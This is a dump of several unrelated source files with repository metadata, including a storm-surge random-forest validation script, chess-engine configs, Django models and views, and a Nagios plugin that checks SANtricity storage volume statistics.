from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
def validateRF():
"""
run KFOLD method for regression
"""
#defining directories
dir_in = "/lustre/fs0/home/mtadesse/merraAllLagged"
dir_out = "/lustre/fs0/home/mtadesse/merraRFValidation"
surge_path = "/lustre/fs0/home/mtadesse/05_dmax_surge_georef"
#cd to the lagged predictors directory
os.chdir(dir_in)
x = 201
y = 202
#empty dataframe for model validation
df = pd.DataFrame(columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse'])
#looping through
for tg in range(x,y):
os.chdir(dir_in)
#filter only .csv files
tgNames = []
for file in glob.glob("*.csv"):
tgNames.append(file)
tg_name = sorted(tgNames)[tg]
print(tg_name)
##########################################
#check if this tg is already taken care of
##########################################
os.chdir(dir_out)
if os.path.isfile(tg_name):
print("this tide gauge is already taken care of")
return "file already analyzed!"
os.chdir(dir_in)
#load predictor
pred = pd.read_csv(tg_name)
pred.drop('Unnamed: 0', axis = 1, inplace = True)
#add squared and cubed wind terms (as in WPI model)
pickTerms = lambda x: x.startswith('wnd')
wndTerms = pred.columns[list(map(pickTerms, pred.columns))]
wnd_sqr = pred[wndTerms]**2
wnd_cbd = pred[wndTerms]**3
pred = pd.concat([pred, wnd_sqr, wnd_cbd], axis = 1)
#standardize predictor data
dat = pred.iloc[:,1:]
scaler = StandardScaler()
print(scaler.fit(dat))
dat_standardized = pd.DataFrame(scaler.transform(dat), \
columns = dat.columns)
pred_standardized = pd.concat([pred['date'], dat_standardized], axis = 1)
#load surge data
os.chdir(surge_path)
surge = pd.read_csv(tg_name)
surge.drop('Unnamed: 0', axis = 1, inplace = True)
#remove duplicated surge rows
surge.drop(surge[surge['ymd'].duplicated()].index, axis = 0, inplace = True)
surge.reset_index(inplace = True)
surge.drop('index', axis = 1, inplace = True)
#adjust surge time format to match that of pred
time_str = lambda x: str(datetime.strptime(x, '%Y-%m-%d'))
surge_time = pd.DataFrame(list(map(time_str, surge['ymd'])), columns = ['date'])
time_stamp = lambda x: (datetime.strptime(x, '%Y-%m-%d %H:%M:%S'))
surge_new = pd.concat([surge_time, surge[['surge', 'lon', 'lat']]], axis = 1)
#merge predictors and surge to find common time frame
pred_surge = pd.merge(pred_standardized, surge_new.iloc[:,:2], on='date', how='right')
pred_surge.sort_values(by = 'date', inplace = True)
#find rows that have nans and remove them
row_nan = pred_surge[pred_surge.isna().any(axis =1)]
pred_surge.drop(row_nan.index, axis = 0, inplace = True)
pred_surge.reset_index(inplace = True)
pred_surge.drop('index', axis = 1, inplace = True)
#in case pred and surge don't overlap
if pred_surge.shape[0] == 0:
print('-'*80)
print('Predictors and Surge don''t overlap')
print('-'*80)
continue
pred_surge['date'] = pd.DataFrame(list(map(time_stamp, \
pred_surge['date'])), \
columns = ['date'])
#prepare data for training/testing
X = pred_surge.iloc[:,1:-1]
y = pd.DataFrame(pred_surge['surge'])
y = y.reset_index()
y.drop(['index'], axis = 1, inplace = True)
#apply PCA
pca = PCA(.95)
pca.fit(X)
X_pca = pca.transform(X)
#apply 10 fold cross validation
kf = KFold(n_splits=10, random_state=29)
metric_corr = []; metric_rmse = []; #combo = pd.DataFrame(columns = ['pred', 'obs'])
for train_index, test_index in kf.split(X):
X_train, X_test = X_pca[train_index], X_pca[test_index]
y_train, y_test = y['surge'][train_index], y['surge'][test_index]
#train regression model
rf= RandomForestRegressor(n_estimators = 50, random_state = 101, \
min_samples_leaf = 1)
rf.fit(X_train, y_train)
#predictions
predictions = rf.predict(X_test)
# pred_obs = pd.concat([pd.DataFrame(np.array(predictions)), \
# pd.DataFrame(np.array(y_test))], \
# axis = 1)
# pred_obs.columns = ['pred', 'obs']
# combo = pd.concat([combo, pred_obs], axis = 0)
#evaluation matrix - check p value
if stats.pearsonr(y_test, predictions)[1] >= 0.05:
print("insignificant correlation!")
continue
else:
print(stats.pearsonr(y_test, predictions))
metric_corr.append(stats.pearsonr(y_test, predictions)[0])
print(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
print()
metric_rmse.append(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
#number of years used to train/test model
num_years = (pred_surge['date'][pred_surge.shape[0]-1] -\
pred_surge['date'][0]).days/365
longitude = surge['lon'][0]
latitude = surge['lat'][0]
num_pc = X_pca.shape[1] #number of principal components
corr = np.mean(metric_corr)
rmse = np.mean(metric_rmse)
print('num_year = ', num_years, ' num_pc = ', num_pc ,'avg_corr = ',np.mean(metric_corr), ' - avg_rmse (m) = ', \
np.mean(metric_rmse), '\n')
#original size and pca size of matrix added
new_df = pd.DataFrame([tg_name, longitude, latitude, num_years, num_pc, corr, rmse]).T
new_df.columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse']
df = pd.concat([df, new_df], axis = 0)
#save df as cs - in case of interruption
os.chdir(dir_out)
df.to_csv(tg_name)
#run script
validateRF()
| [
"michaelg.tadesse@gmail.com"
] | michaelg.tadesse@gmail.com |
5ea7785ad2b75c33ec9508d20347b8ab49ea1b2b | 08832b678fb982e4333d41fe19f8eaa278e988f3 | /src/chess_zero/configs/normal.py | 8c5158c49918366b9e5ae230c7a8d33632d859a0 | [
"MIT"
] | permissive | BenisonSam/chessprime | a8710f03a27e3008960cd9fe3b394ed06a16c10b | a020be8669535016d4a1cc2966c9b04ef20c1112 | refs/heads/master | 2020-03-28T10:42:20.788183 | 2018-09-17T09:12:25 | 2018-09-17T09:12:25 | 148,136,275 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,089 | py | """
Contains the set of configs to use for the "normal" version of the app.
"""
class EvaluateConfig:
    """Settings used when pitting a newly trained model against the current best."""

    def __init__(self):
        self.vram_frac = 1.0    # fraction of GPU memory the evaluation worker may use
        self.game_num = 50      # games played per evaluation round
        self.replace_rate = 0.55  # win rate needed to promote the challenger -- TODO confirm
        # Evaluation reuses the normal play settings with a few overrides.
        self.play_config = PlayConfig()
        self.play_config.simulation_num_per_move = 200
        self.play_config.thinking_loop = 1
        self.play_config.c_puct = 1 # lower = prefer mean action value
        self.play_config.tau_decay_rate = 0.6 # I need a better distribution...
        self.play_config.noise_eps = 0
        self.evaluate_latest_first = True   # evaluate the newest checkpoint first
        self.max_game_length = 1000         # hard cap on plies per evaluation game
class PlayDataConfig:
    """Settings controlling how game data is filed for training."""

    def __init__(self):
        self.min_elo_policy = 500 # 0 weight
        self.max_elo_policy = 1800 # 1 weight
        self.sl_nb_game_in_file = 250   # games per file for supervised-learning data
        self.nb_game_in_file = 50       # games per file for self-play data
        self.max_file_num = 150         # cap on retained data files -- TODO confirm rotation behavior
class PlayConfig:
    """Self-play / tree-search parameters."""

    def __init__(self):
        self.max_processes = 3          # concurrent self-play processes
        self.search_threads = 16        # parallel search threads per game
        self.vram_frac = 1.0
        self.simulation_num_per_move = 800  # simulations run before each move
        self.thinking_loop = 1
        self.logging_thinking = False
        self.c_puct = 1.5               # exploration weight (cf. EvaluateConfig: lower = prefer mean action value)
        self.noise_eps = 0.25           # root-noise mixing weight
        self.dirichlet_alpha = 0.3      # Dirichlet noise concentration
        self.tau_decay_rate = 0.99      # move-selection temperature decay
        self.virtual_loss = 3
        self.resign_threshold = -0.8    # resign when evaluation drops below this
        self.min_resign_turn = 5        # never resign before this turn
        self.max_game_length = 1000     # hard cap on plies per game
class TrainerConfig:
    """Optimization-loop parameters."""

    def __init__(self):
        self.min_data_size_to_learn = 0
        self.cleaning_processes = 5 # RAM explosion...
        self.vram_frac = 1.0
        self.batch_size = 384 # tune this to your gpu memory
        self.epoch_to_checkpoint = 1
        self.dataset_size = 100000
        self.start_total_steps = 0
        self.save_model_steps = 25      # checkpoint every N steps
        self.load_data_steps = 100      # reload training data every N steps -- TODO confirm
        self.loss_weights = [1.25, 1.0] # [policy, value] prevent value overfit in SL
class ModelConfig:
    """Neural-network architecture hyper-parameters (shared class attributes)."""

    cnn_filter_num = 256        # filters per convolutional layer
    cnn_first_filter_size = 5   # kernel size of the first convolution
    cnn_filter_size = 3         # kernel size of subsequent convolutions
    res_layer_num = 7           # number of residual layers
    l2_reg = 1e-4               # L2 regularization coefficient
    value_fc_size = 256         # width of the value head's fully connected layer
    distributed = False
    input_depth = 18            # number of input planes fed to the network
| [
"benisonsam@hotmail.com"
] | benisonsam@hotmail.com |
a741f54aa2bfa5f22db1890af574ff5b01ac58b0 | 4b46bcb9e3883a57f46d490da424e8d9463ba8aa | /PyFolder/Python_Django/app_integration/apps/appintegrate/models.py | 9f694e3217e40b8ecf4af783c0155140d3aaa317 | [] | no_license | LAdkins81/DojoAssignments | 1752c131454dc6f259d4e84390af218e1a423b50 | 7bc7a92bed72ff37c5d8991e478ffae8fefd82db | refs/heads/master | 2021-01-11T17:53:03.814123 | 2017-05-09T14:58:33 | 2017-05-09T14:58:33 | 79,859,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 905 | py | from __future__ import unicode_literals
from django.db import models
from ..courses.models import Course
from ..loginandreg.models import User
from django.db.models import Count
# Create your models here.
class UserCourseManager(models.Manager):
    """Custom manager exposing enrollment helpers for UserCourse."""

    def addUserToCourse(self, object):
        """Enroll a user in a course.

        ``object`` (shadows the builtin -- rename candidate) is a mapping with
        'users' and 'courses' entries holding the respective primary keys.
        Propagates DoesNotExist if either id is unknown.
        """
        user_id = object['users']
        user = User.objects.get(id=user_id)
        course_id = object['courses']
        course = Course.objects.get(id=course_id)
        UserCourse.objects.create(user_id=user, course_id=course)
        return {'success' : 'User added to course'}
class UserCourse(models.Model):
    """Join table linking users to the courses they are registered in."""

    # NOTE(review): the *_id fields are ForeignKeys (they hold model instances,
    # and Django appends a second "_id" for the DB column) -- naming is misleading.
    user_id = models.ForeignKey(User, null=True, related_name="reg_users")
    course_id = models.ForeignKey(Course, related_name="reg_courses")
    created_at = models.DateTimeField(auto_now_add=True, null=True)  # set once on creation
    updated_at = models.DateTimeField(auto_now=True)                 # refreshed on every save
    objects = UserCourseManager()
| [
"lahell@gmail.com"
] | lahell@gmail.com |
fbac34aabd50a2235d848ef5c7e4c29759c931b6 | 932c4995ce130967d79f2d11045a5768e9e0eae9 | /ccms/models.py | 7a2545967d7da8cf8fbd08acd28eba921c336a40 | [] | no_license | MAHRahat/CCMS-Server | c53cb2448b0feca798ebe75286e0b74edb9716af | 923f5622e6e426d8aa909045e918a08bc094c7d0 | refs/heads/master | 2023-07-05T01:00:27.215293 | 2021-08-21T12:12:52 | 2021-08-21T12:12:52 | 394,878,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,086 | py | from django.contrib.auth.models import AbstractUser
from django.db import models
from ccms.managers import CCMSUserManager
class CCMSUser(AbstractUser):
    """
    Custom user model for the City Complaints Management System.

    Replaces Django's username/first/last-name fields with a unique e-mail
    login plus optional profile details.
    """
    user_id = models.AutoField(primary_key=True)
    # Drop the stock AbstractUser fields this model does not use.
    username = None
    first_name = None
    last_name = None
    email = models.EmailField(unique=True, null=False, blank=False, db_column='email')
    cell_no = models.CharField(unique=True, max_length=14, null=True, blank=True)
    name = models.CharField(max_length=25, null=True, blank=True)
    address = models.TextField(null=True, blank=True)
    is_employee = models.BooleanField(default=False)  # True for employee accounts

    USERNAME_FIELD = 'email'   # authenticate with e-mail instead of username
    REQUIRED_FIELDS = []

    objects = CCMSUserManager()

    class Meta:
        db_table = 'ccms_users'

    def __str__(self):
        # Fall back to the e-mail address until a display name is set.
        if self.name is None:
            return f"{self.email}"
        else:
            return f"{self.name}"
class Categories(models.Model):
    """Complaint category with an associated keyword (use of keyword -- TODO confirm)."""

    category_id = models.AutoField(primary_key=True, unique=True)
    category = models.CharField(max_length=25)
    keyword = models.CharField(max_length=25)

    class Meta:
        db_table = 'ccms_categories'

    def __str__(self):
        return f"{self.category} {self.keyword}"
class Complaints(models.Model):
    """A citizen-submitted complaint and its processing status."""

    complaints_id = models.BigAutoField(primary_key=True, unique=True)
    time_submitted = models.DateTimeField(auto_now_add=True)   # set once on creation
    time_last_updated = models.DateTimeField(auto_now=True)    # refreshed on every save
    citizen_id = models.ForeignKey(CCMSUser, on_delete=models.CASCADE)
    description = models.TextField(null=True, blank=False)
    category_id = models.ForeignKey(Categories, on_delete=models.CASCADE)
    status = models.CharField(null=True, max_length=30, default='Submitted')
    location = models.TextField(null=True)

    class Meta:
        db_table = 'ccms_complaints'

    def __str__(self):
        return f"{self.description}"

    def citizen_name(self):
        # Convenience accessor for templates/serializers.
        return self.citizen_id.name

    def category_name(self):
        return self.category_id.category
| [
"fountaein@yandex.com"
] | fountaein@yandex.com |
ee1909557fe8fdc1337bf5aa9e810d27022883ff | 2e3b9b34e5129213c3c9983b859ab87c8e6d4b09 | /src/inventory/dashboard/views.py | c8a285bbab52cc9296a0f7ffafd3450285696e82 | [] | no_license | BryanGmz/inventory | 7fee12c9150cc47528d7fdd195dc9a43b1629534 | bae5eac056e9821fc8757ac19bb57098455ba0dc | refs/heads/main | 2023-08-19T10:23:09.763323 | 2021-10-26T05:25:52 | 2021-10-26T05:25:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,008 | py | from django.contrib.messages.api import error
from django.shortcuts import render
from datetime import datetime
from django.db.models import Sum
import json
from inventory.clients.models import ProductSale, Sale
# Create your views here.
def FirstDayOfMonth():
    """Return a datetime at the very start (00:00:00.000000) of the current month.

    Fixes the original, which chained three ``replace`` calls and never reset
    ``microsecond``, so the "start of month" still carried a sub-second offset.
    """
    return datetime.today().replace(day=1, hour=0, minute=0, second=0, microsecond=0)
def serialize(objects, name):
    """Render the ``name`` field of each mapping in ``objects`` as a
    JSON-style array string, e.g. ``"[1,2,3]"``.

    Fixes the empty-input bug: the original unconditionally sliced off a
    trailing comma, turning ``"["`` into ``""`` and returning ``"]"`` for an
    empty sequence. ``str.join`` also avoids quadratic concatenation.
    """
    return "[" + ",".join(str(obj[name]) for obj in objects) + "]"
def sales_month(firstdayofmonth):
    """Build the ECharts option-JSON string for this month's daily sales chart.

    Aggregates ``Sale.total`` per day since ``firstdayofmonth`` and splices the
    day labels and totals (via ``serialize``) into a hand-written JSON template.
    """
    ventas=Sale.objects.extra(select={'dia':'EXTRACT(DAY FROM datetime)', 'total':'total'}).filter(datetime__gte=firstdayofmonth).values('datetime__day').annotate(total=Sum('total')).order_by('datetime__day')
    #print('.........')
    #print(str(ventas.query))
    return ('{"title": {"text": "Ventas del Mes"},"tooltip": {"trigger": "axis"},"legend": {"data": ["Ventas"]},"grid": {"left": "3%","right": "4%","bottom": "3%","containLabel": "true"},"toolbox": {"show": "true","feature": {"dataZoom": {"yAxisIndex": "none"},"dataView": { "readOnly": "false" },"magicType": { "type": ["line", "bar"] },"restore": {},"saveAsImage": {}}},"xAxis": {"type": "category","boundaryGap": "false","data": '+serialize(ventas, 'datetime__day')+'},"yAxis": {"type": "value"},"series": [{"name": "Ventas","type": "line","stack": "Total","data": '+serialize(ventas,'total')+'}]}')
def product_most(firstdayofmonth):
    """Return the product type with the most units sold since ``firstdayofmonth``, or None."""
    # Earlier query drafts kept for reference:
    #pubs=ProductSale.objects.select_related('sale', 'product', 'product__producttype', 'product__producttype__category').values_list('sale_id', 'product_id','product__producttype_id', 'product__producttype__category_id', 'product__producttype__category__name', 'sale__datetime')
    #pubs=ProductSale.objects.select_related('sale', 'product', 'product__producttype', 'product__producttype__category').values_list('product__producttype_id', 'product__producttype__name', 'product__producttype__category_id', 'product__producttype__category__name', 'quantity', 'total', 'sale_id', 'product_id', 'sale__datetime')
    #pubs=ProductSale.objects.filter(sale__datetime__gte=firstdayofmonth).select_related('sale', 'product', 'product__producttype', 'product__producttype__category').values_list('product__producttype_id', 'product__producttype__name', 'product__producttype__category_id', 'product__producttype__category__name', 'quantity', 'total', 'sale__datetime')
    pubs=ProductSale.objects.filter(sale__datetime__gte=firstdayofmonth).select_related('sale', 'product', 'product__producttype', 'product__producttype__category').values_list('product__producttype_id', 'product__producttype__name', 'quantity', 'total').values('product__producttype_id', 'product__producttype__name').annotate(productos=Sum('quantity')).annotate(total=Sum('total')).order_by('productos')
    hola=None
    if (len(pubs)>0):
        # Rows are ordered ascending by units sold, so the last one is the best seller.
        hola=pubs[len(pubs)-1]
    #print(hola)
    return hola
def product_worst(firstdayofmonth):
    """Return the product type with the fewest units sold since ``firstdayofmonth``, or None."""
    pubs=ProductSale.objects.filter(sale__datetime__gte=firstdayofmonth).select_related('sale', 'product', 'product__producttype', 'product__producttype__category').values_list('product__producttype_id', 'product__producttype__name', 'quantity', 'total').values('product__producttype_id', 'product__producttype__name').annotate(productos=Sum('quantity')).annotate(total=Sum('total')).order_by('productos')
    hola=None
    if (len(pubs)>0):
        # Rows are ordered ascending by units sold, so the first one is the worst seller.
        hola=pubs[0]
    #print(hola)
    return hola
def dashboard(request):
    """Render the dashboard page: monthly sales chart plus best/worst product stats."""
    month_start = FirstDayOfMonth()
    # One chart id / ECharts option pair for the monthly-sales chart.
    chart_names = ['id_0']
    chart_options = [sales_month(month_start)]
    return render(
        request,
        "dashboard/dashboard.html",
        {
            'options': json.dumps(chart_options),
            'names': json.dumps(chart_names),
            'most_product': product_most(month_start),
            'worst_product': product_worst(month_start),
        },
    )
| [
"jmateo.cys@gmail.com"
] | jmateo.cys@gmail.com |
000bc01dc5ca748102e823a1e0462832615627a0 | 411c6b248cec9388a6424cf50f7d518f3d4d3b52 | /Forum/TestAPI/post/PostDetail.py | 75ad937b7e16647021500b974b7e3c5557740e41 | [] | no_license | ArturAmbartsumov/DBProject | cc44017bdc49eb13aee424bce2d2cfda4d9ba263 | 12f58c51d02fc181fe5b09203430e6503ab8de46 | refs/heads/master | 2021-01-20T06:27:43.399475 | 2014-07-06T01:12:52 | 2014-07-06T01:12:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | py | import json
import requests

# Quick manual check of the forum API: fetch post id 6 with its related
# user, forum and thread objects expanded.
# NOTE(review): Python 2 source (bare ``print`` statements below).
payload = {'related': ['user', 'forum', 'thread'], 'post': '6'}
url = 'http://127.0.0.1:8000/post/details/'
r = requests.get(url, params = payload)
print r.status_code
#print r.text
print r.json() | [
"Artur_pskov@mail.ru"
] | Artur_pskov@mail.ru |
e82a53d75ae0617ec841adac5d5a66b3bdd1931e | 3edec2ab1fe22a5aa8a72583597c3797200b5420 | /plugins/Check_SANtricity_Volume_Status_BYCON.py | 5c560cb99dd103794383679353bfdb96548054e2 | [] | no_license | dupondje/netapp_santricity_nagios | 42adfea65ca495fbee8adcbe5d4063c36d083788 | 8ab202ea01893457b5211ee2b69248362bb5e516 | refs/heads/master | 2022-04-30T19:30:18.976906 | 2017-07-13T09:36:26 | 2017-07-13T09:36:26 | 97,102,738 | 4 | 1 | null | 2022-03-22T09:51:44 | 2017-07-13T09:04:55 | Python | UTF-8 | Python | false | false | 12,653 | py | #!/usr/bin/python
# Copyright 2015 NetApp Inc. All rights reserved.
import sys
import csv
import logging
import SANtricityStorage
from logging.handlers import RotatingFileHandler

# Nagios plugin: report SANtricity volume statistics aggregated per controller.
# (Python 2 source: ``print`` statements and ``except Exception, err`` below.)

# Defaults; overwritten by the command-line arguments parsed at the bottom.
serverUrl = "https://10.0.1.30:8443"
mode = ""
# Short mode code -> REST statistic field name.
listMode = {"RIOP": "readIOps", "WIOP": "writeIOps", "RLAT": "readResponseTime", "WLAT": "writeResponseTime",
            "RTHP": "readThroughput", "WTHP": "writeThroughput"}
# Short mode code -> human-readable label for the plugin output.
dirmsg = {"RIOP": "Read IOP", "WIOP": "Write IOP", "RLAT": "Read Latency", "WLAT": "Write Latency",
          "RTHP": "Read Throughput", "WTHP": "Write Throughput"}
# Short mode code -> perfdata unit suffix.
dirunit = {"RIOP": "MS", "WIOP": "MS", "RLAT": "MS", "WLAT": "MS", "RTHP": "B", "WTHP": "B"}
urlToServer = serverUrl + "/devmgr/v2"
loginUrl = serverUrl + "/devmgr/utils"
logging.basicConfig(format='%(asctime)s - %(name)s : %(message)s', filename='/tmp/nagios-python.log', level=logging.INFO)
handler = RotatingFileHandler('/tmp/nagios-python.log', maxBytes=SANtricityStorage.maxbytes,
                              backupCount=20)
# Thresholds and alert counters shared (as globals) with the functions below.
high = 95.0
low = 0.0
range = ""   # NOTE(review): shadows the builtin ``range``
username = "rw"
password = "rw"
warningdrive=0
criticaldrive=0
stat = 0     # worst Nagios state seen so far (0 OK / 1 warning / 2 critical / 3 unknown)
hostipaddress = ""
logger = logging.getLogger("VOLUMESTATBYCONT")
logger.setLevel(logging.INFO)
logger.addHandler(handler)
def get_volume_info(arrayid, controllerids, sessionid, arrayinfo):
    """Fetch analysed volume statistics for one array and aggregate the selected
    metric (global ``mode``) per controller, updating the global alert counters.

    Returns a dict keyed by controller id plus 'strOutPut' (alert text) and
    'strPerData' (Nagios perfdata) entries; exits with UNKNOWN on empty response.
    """
    global total
    global stat
    global warningdrive
    global criticaldrive
    try:
        logger.debug("In Volume INFO")
        lstOfArraySys = []
        lstOfArraySys = SANtricityStorage.get_data_from_REST(urlToServer, sessionid, arrayid,
                                                             "analysed-volume-statistics")
        if lstOfArraySys and len(lstOfArraySys) > 0:
            logger.debug("Response received")
            logger.debug(len(lstOfArraySys))
            dirdata = {}
            arrayidwiseinfo = arrayinfo[arrayid]
            controllername = arrayidwiseinfo["controllerLabel"]
            keytofatch = listMode[mode]   # REST field name for the selected metric
            # Sum the metric of every volume under its owning controller.
            for lst in lstOfArraySys:
                if lst["controllerId"] not in dirdata:
                    dirdata[lst["controllerId"]] = {"readIOP": 0}
                cntconwise = 0
                logger.debug(
                    "Volume Id : " + lst["volumeId"] + ", controllerId : " + lst["controllerId"] + ", poolId : " + lst[
                        "poolId"] + ", " + keytofatch + " : " + str(round(lst[keytofatch], 2)))
                cntconwise = (dirdata[lst["controllerId"]])["readIOP"]
                if mode == "RTHP" or mode == "WTHP":
                    # cntconwise+=(lst[keytofatch] /(1024*1024))
                    cntconwise += round(lst[keytofatch], 2)
                else:
                    # cntconwise+=lst[keytofatch]/1000
                    cntconwise += round(lst[keytofatch], 2)
                (dirdata[lst["controllerId"]])["readIOP"] = cntconwise
            strOutPut = ""
            strPerData = ""
            showoutput = False
            total =len(controllerids)
            # Classify each controller total against the warning/critical thresholds.
            for lstContId in controllerids:
                lstrContData = dirdata[lstContId]
                contwiseLat = lstrContData["readIOP"]
                if (range== "low" and contwiseLat <=low and contwiseLat >high) or (range =="high" and contwiseLat >=low and contwiseLat <high):
                    if stat < 1:
                        stat = 1
                    warningdrive +=1
                    showoutput = True
                elif (range == "low" and contwiseLat <= high) or (range == "high" and contwiseLat >=high):
                    if stat < 2:
                        stat = 2
                    showoutput = True
                    criticaldrive +=1
                contwiseLat = round(contwiseLat, 2)
                if showoutput:
                    # Detail line only for controllers in warning/critical state.
                    strOutPut += "\nArray Name : " + arrayidwiseinfo["arrayName"] + ", Controller Name : " + \
                                 controllername[lstContId] + ", " + dirmsg[mode] + " : " + str(contwiseLat)
                strPerData += arrayidwiseinfo["arrayName"] + "-" + controllername[lstContId] + "=" + str(contwiseLat) + \
                              dirunit[mode] + ";" + str(low) + ":" + str(low) + ";@" + str(low) + ":" + str(high) + "; "
                showoutput = False
            dirdata["strOutPut"] = strOutPut
            dirdata["strPerData"] = strPerData
            return dirdata
        else:
            print "STATUS UNKNOWN - No details fetched from the array."
            sys.exit(3)
    except Exception, err:
        logger.error("Error in get volume info", exc_info=True)
        # return False
def getVolumeState():
    """Read controller.csv, gather per-controller volume stats for each array,
    and assemble the full Nagios status line plus perfdata string."""
    global stat
    sessionId = SANtricityStorage.login(loginUrl,username,password)
    logger.debug("In getVolume State method")
    # Refresh the cached storage-system details (produces controller.csv).
    SANtricityStorage.getStorageSystemDetails(urlToServer, sessionId, SANtricityStorage.getTime())
    file = SANtricityStorage.getStoragePath() + "/controller.csv"  # NOTE(review): shadows builtin ``file``
    fileForRead = open(file, "rb")
    csvReader = csv.reader(fileForRead, delimiter=",")
    firstLine = True
    currentArrayId = ""
    controllerId = []
    arrayInfo = {}
    strResultData = ""
    strResultPerData = ""
    lstResult = []
    controllerName = {}
    arrayId = ""
    for row in csvReader:
        if firstLine:
            # First CSV row is the header; remember it for index lookups.
            headerList = row
            firstLine = False
        else:
            if hostipaddress and (
                    row[headerList.index("ip1")] == hostipaddress or row[headerList.index("ip2")] == hostipaddress):
                # Host filter active: only collect controllers matching the ip.
                controllerId.append(row[headerList.index("controllerRef")])
                controllerName[row[headerList.index("controllerRef")]] = row[headerList.index("controllerLabel")]
                arrayId = row[headerList.index("arrayId")]
                arrayInfo[arrayId] = {"arrayName": row[headerList.index("arrayName")],
                                      "controllerLabel": controllerName}
            elif hostipaddress == "":
                arrayId = row[headerList.index("arrayId")]
                arrayInfo[arrayId] = {"arrayName": row[headerList.index("arrayName")],
                                      "controllerLabel": controllerName}
                # Array boundary crossed: flush the previous array's controllers.
                if currentArrayId <> arrayId and len(controllerId) <> 0:
                    (arrayInfo[currentArrayId])["controllerLabel"] = controllerName
                    lstResult.append(get_volume_info(currentArrayId, controllerId, sessionId, arrayInfo))
                    controllerId = []
                    controllerName = {}
                    controllerId.append(row[headerList.index("controllerRef")])
                    controllerName[row[headerList.index("controllerRef")]] = row[headerList.index("controllerLabel")]
                elif currentArrayId <> arrayId:
                    controllerId = []
                    controllerName = {}
                    controllerId.append(row[headerList.index("controllerRef")])
                    controllerName[row[headerList.index("controllerRef")]] = row[headerList.index("controllerLabel")]
                else:
                    controllerId.append(row[headerList.index("controllerRef")])
                    controllerName[row[headerList.index("controllerRef")]] = row[headerList.index("controllerLabel")]
            currentArrayId = arrayId
    if arrayId:
        # Flush the final array group after the loop.
        (arrayInfo[arrayId])["controllerLabel"] = controllerName
        lstResult.append(get_volume_info(arrayId, controllerId, sessionId, arrayInfo))
    firstPerData = ""
    firstLine = True
    for listEle in lstResult:
        strResultData += listEle["strOutPut"]
        if firstLine:
            # The first perfdata token goes right after the status text;
            # everything else is appended to the trailing perfdata section.
            firstPerData = listEle["strPerData"]
            strArry = firstPerData.split(" ")
            firstPerData = strArry[0]
            strResultPerData += strArry[1] + " "
            firstLine = False
        else:
            strResultPerData += listEle["strPerData"]
    strResultPerData = strResultPerData.strip()
    strResultData = "\nThreshold Values - Range Selector : "+range +", Warning : " + str(low) + ", Critical : " \
                    + str(high)+"\nVolume Statistics by Controller\nTotal : "+str(total)+", OK : "+\
                    str(total -(warningdrive +criticaldrive))+", Warning : "+str(warningdrive)+\
                    ", Critical : "+str(criticaldrive) + strResultData
    if stat == 0:
        strResult = "OK - All controllers are within defined threshold.|" + firstPerData + "\n" + strResultData + "|" + strResultPerData
    elif stat == 1:
        strResult = "Warning - Some controllers are functioning at threshold values.|" + firstPerData + "\n" + strResultData + "|" + strResultPerData
    elif stat == 2:
        strResult = "Critical - Some controllers are out side threshold values.|" + firstPerData + "\n" + strResultData + "|" + strResultPerData
    else:
        stat = 3
        strResult = "Unknown - Host Ip is not configured with web proxy"
    fileForRead.close()
    return strResult
# --- Command-line entry point (Python 2 script) -------------------------------
# Parses "-flag value" pairs from sys.argv, validates the thresholds, then
# prints a Nagios status line and exits with the matching status code.
try:
    logger.info("Hi in file")
    if len(sys.argv) < 8:
        print "STATUS UNKNOWN - Required parameters not set"
        sys.exit(3)
    else:
        nextelearg = False
        argmap = {"mode": "", "hostIp": "", "proxyUrl": "", "warning": "", "critical": "","r":"","username":"","password":""}
        argname = ""
        # Simple flag parser: a recognized "-flag" marks the next argv element as its value.
        for element in sys.argv:
            if element.endswith(".py"):
                continue
            elif nextelearg:
                argmap[argname] = element
                nextelearg = False
            elif element == "-mode":
                nextelearg = True
                argname = "mode"
            elif element == "-warning":
                nextelearg = True
                argname = "warning"
            elif element == "-critical":
                nextelearg = True
                argname = "critical"
            elif element == "-h":
                nextelearg = True
                argname = "hostIp"
            elif element == "-webproxy":
                nextelearg = True
                argname = "proxyUrl"
            elif element == "-username":
                nextelearg = True
                argname = "username"
            elif element == "-password":
                nextelearg = True
                argname = "password"
            elif element == "-r":
                nextelearg = True
                argname = "r"
            elif element == "-debug":
                # Re-bind the module logger at DEBUG level.
                logger = logging.getLogger("VOLUMESTATBYCONT")
                logger.setLevel(logging.DEBUG)
                logger.addHandler(handler)
            else:
                print "Invalid arguments passed"
                sys.exit(3)
        # Rebuild the REST endpoints from the supplied proxy address.
        serverUrl = "https://" + argmap["proxyUrl"];
        urlToServer = serverUrl + "/devmgr/v2"
        loginUrl = serverUrl + "/devmgr/utils"
        if argmap["r"] != "":
            range = argmap["r"]
        else:
            print "STATUS UNKNOW - No range selector defined."
            sys.exit(3)
        if range != "low" and range != "high":
            print "STATUS UNKNOW - Incorrect value for range selector. It must be either \"low\" or \"high\". "
            sys.exit(3)
        try:
            low = float(argmap["warning"])
        except Exception, err:
            print "STATUS UNKNOWN - Warning threshold must be numeric"
            sys.exit(3)
        try:
            high = float(argmap["critical"])
        except Exception, err:
            print "STATUS UNKNOWN - Critical threshold must be numeric"
            sys.exit(3)
        # Thresholds must be ordered consistently with the range selector.
        if (range == "high" and low >= high) or (range == "low" and low <= high):
            print 'STATUS UNKNOWN - Incorrect value for warning and critical threshold'
            sys.exit(3)
        if argmap["username"] !="":
            global username
            username = argmap["username"]
        if argmap["password"] !="":
            global password
            password = argmap["password"]
        mode = argmap["mode"];
        try:
            # Membership check via lookup; KeyError means an unknown mode code.
            index = listMode[mode];
        except:
            print "STATUS UNKNOWN - Incorrect value for mode"
            sys.exit(3)
        hostipaddress = argmap["hostIp"]
        logger.debug("Low Threshold:" + str(low))
        logger.debug("High Threshold:" + str(high))
        logger.debug("Server URL:" + serverUrl)
        logger.debug("Host Add" + hostipaddress)
        logger.debug("Mode:" + mode)
        # NOTE(review): ``str`` is shadowed by the result string below.
